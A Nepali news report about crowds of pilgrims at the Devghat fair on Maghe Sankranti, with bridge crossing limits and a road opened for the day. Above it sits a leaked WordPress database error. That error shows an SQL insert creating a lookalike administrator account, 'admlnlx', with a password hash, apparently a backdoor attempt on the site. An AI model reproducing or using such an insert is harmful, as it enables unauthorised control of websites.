WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BE2CNl4UEIE1DQgh.N4leNd2L60Qr3/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 01:37:33', '', 'admlnlx', 'admlnlx')
केदार शर्मा,
चितवन माघ १-
धार्मिक तीर्थस्थल देवघाटमा यति बेला भक्तजनको घुईचो लागेको छ । मेला भर्नको लागि देशका बिभिन्न स्थान बाट भक्तजन आएको देवघाट क्षेत्र विकास समितिका अध्यक्ष टङ्कनाथ पौडेलले जानकारी दिनु भयो ।अहिले देबघाटमा भक्तजनको अत्याधिक चाप रहेको छ ।
रातभर जाग्राम बसेर विहान स्नान गरी पूजाआजा गर्दा पुण्य मिल्ने र मनोकामना पुरा हुने विश्वासमा भक्तहरुको आकर्षण बढेको हो। चितवन ,नवलपरासी र तनहुँको संगम स्थल रहेको देवघाटधाममा हरेक हिन्दुहरुको पर्वमा मेला लाग्ने गर्दछ। अहिलेविहानसम्म दशौं हजार भक्तहरुले मेला भरेको र यो क्रम आज साँझसम्म जारी रहने देवघाट क्षेत्रविकास समितिले जनाएको छ। यहाँ मुख्यत देवताले स्नान गर्ने दिनको रुपमा आज मेला भर्न भक्तजनहरु आउने गर्दछन् ।
मेलाका बेला हुने सम्भावित खतरालाई ध्यानमा राखी त्रिशूली नदीमाथिको झोलुङ्गे पुल जीर्ण बन्दै गएकाले भक्तजनको सुरक्षालाई एकपटकमा सयजनालाई मात्रै आवतजावत गर्न दिइने देवघाट क्षेत्र विकास समितिका अध्यक्ष पौडेलले जानकारी दिए ।
त्यसतै भक्तजनको सहजताको लागि नियमित बिहान साँढे १० बजेदेखि दिउसो ३ बजेसम्म बन्द हुँदै आएको चितवनको नारायणगढ–मुग्लिन सडक माघे सङ्क्रान्तिमा लाग्ने देवघाट मेलालाई ध्यानमा राखेर आज एकदिन खुला गरिएको छ ।